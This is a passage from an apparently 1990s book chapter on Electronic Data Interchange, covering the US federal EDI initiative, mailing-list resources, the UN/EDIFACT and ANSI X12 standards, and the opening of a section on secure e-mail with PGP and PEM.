The President's order formed the Federal Electronic Commerce Acquisition Team (ECAT) that generated the guidelines for the Federal EDI initiative. ECAT has since been reorganized into the Federal Electronic Commerce Acquisition Program Office (ECA-PMO); its documents (and those of ECAT) are available on the Internet at ftp://ds.internic.net/pub/ecat.library/. The ECA-PMO also operates a Web site at http://snad.ncsl.nist.gov:80/dartg/edi/fededi.html courtesy of the National Institute of Standards and Technology (NIST).

The federal implementation guidelines for purchase orders (in ftp://ds.internic.net/pub/ecat.library/fed.ic/ascii/part-22.txt) provide over 100 pages of details on how the U.S. government interprets X12 transaction set 850 (described later in more detail in the "ANS X12" section).

RFC 1865, dated January 1996 and titled "EDI Meets the Internet," was written by a small team led by Walter Houser of the U.S. Department of Veterans Affairs and reflects part of the federal focus and enthusiasm for EDI. Although much of EDI is conducted through VANs, RFC 1865 points out that the EDI standards allow almost any means of transfer and that the Internet is well-suited for most EDI functions. The RFC quotes the ECAT as saying, "The Internet network may be used for EDI transactions when it is capable of providing the essential reliability, security, and privacy needed for business transactions." You can read this RFC from the files on the CD-ROMs that accompany this book.

Although the largest portion of federal EDI is conducted over the VANs, RFC 1865 makes a strong case that tools are available on the Internet today to provide this essential reliability, security, and privacy.

NOTE
For more information on the Federal EDI initiative, join the FED-REG mailing list. To subscribe, send a message to fed-reg-request@snad.ncsl.nist.gov. The message body should contain only the following line:
subscribe fed-reg
ECAT also operates a mailing list, appropriately named ecat. To subscribe, send a message to listserv@forums.fed.gov containing only the following line:
subscribe ecat firstname lastname

NOTE
For more general information on EDI, subscribe to the EDI-L mailing list. Send a message to listserv@uccvma.ucop.edu containing only the following line:
subscribe edi-l yourname
This mailing list also is transferred via gateway to the UseNet newsgroup bit.listserv.edu-l.
New methods of EDI, including EDI over the Internet, are discussed on the EDI-NEW mailing list. Send a message to edi-new-request@tegsun.harvard.edu containing only the following line:
subscribe edi-new yourname


ON THE WEB
ftp://ftp.sterling.com/edi/lists/  To come up to speed quickly on EDI, review archives of the many EDI-related mailing lists stored at this site.

EDI Standards

The key to making EDI work on a large scale is the rigorous use of standards. In recent years, two groups of standards have emerged-an international standard promulgated by the United Nations, and a U.S. standard designed by ANSI. More recently, both organizations have agreed to build a unified standard, which will allow EDI to become truly worldwide. This section describes the two major standards sets and their proposed unification.

UN/EDIFACT  The United Nations promulgates a set of rules "for Electronic Data Interchange for Administration, Commerce and Transport" (UN/EDIFACT). The full standards are available online at http://www.premenos.com/. Each document type (known in EDI circles as a transaction set) is quite robust. For example, a purchase order can specify multiple items or services, from more than one delivery schedule, with full details for transport and destination as well as delivery patterns.

The full UN/EDIFACT standard is available online via gopher at gopher://infi.itu.ch. Go to Entry 11 (U.N. and international organizations). Choose Entry 1 (U.N. EDITRANS, U.S./EDIFACT), then Entry 3 (UN-EDIFACT standards database), then Entry 1 (Publications). The actual standards are at Option 1, "Drafts." Draft D93A becomes standard S94a, D94a becomes the following year's standard, and so on.

As an alternative to gopher, you can get the standards by e-mail. Send a message to itudoc@itu.ch containing the following body:

START
GET ITU-1900
END

ASC X12  The U.S. standards accrediting body is ANSI. ANSI defines EDI through its Accredited Standards Committee X12, and the EDI standard has taken on the name of that committee.

CAUTION
The ANSI EDI standards are voluminous. Before investing in EDI software, get the help of a good consultant; before writing any EDI software of your own, read the standards. The X12 standard is available from
Data Interchange Standards Association, Inc.
1800 Diagonal Road, Suite 200
Alexandria, Virginia 22314-2852
Voice: 1-703-548-7005
FAX: 1-703-548-5738

TIP
For more information on X12, subscribe to the x12g and x12c-impdef mailing lists. For the former, send e-mail to x12g-request@snad.ncsl.nist.gov with the following message:
subscribe x12g
For the latter, send e-mail to x12c-impdef-request@snad.ncsl.nist.gov with the following message:
subscribe x12c-impdef

The Grand Unification  UN/EDIFACT and X12 are due to be merged, and many firms already are using one of these two standards as the basis for their in-house standard. Subscribe to the EDI mailing lists mentioned earlier or work with an EDI-mapping software developer (some points of contact are coming up in the next section) to find out which standards may apply to your firm and your trading partners.

Secure E-Mail

EDI is associated with real money, and is a natural target of thieves. Here are a few ways that a thief can take advantage of unsecured EDI:

To combat these problems, EDI needs two kinds of security:

Both needs can be met using the public key encryption systems that were introduced earlier in the chapter.

NOTE
Netscape Communications Corporation has announced that Navigator 4.0 (codenamed Galileo) will have built-in secure e-mail. Given Netscape's dominant position in the marketplace, this move is sure to make secure e-mail ubiquitous by 1997.

PGP  Recall that PGP (Pretty Good Privacy) is a private implementation of public key cryptography by Phil Zimmerman. His software is widely available in the U.S. and overseas, and a commercial version also is available.

PGP can provide encryption and digital signatures, as well as encryption of local files using a secret key algorithm.

The PGP code is open for inspection and has been vetted thoroughly. It's not based on open standards (Internet RFCs); however, it's not often named as part of an EDI or near-EDI communications standard.

PEM  Privacy-Enhanced Mail (PEM) is defined in RFCs 1421 through 1424. PEM provides three major sets of features: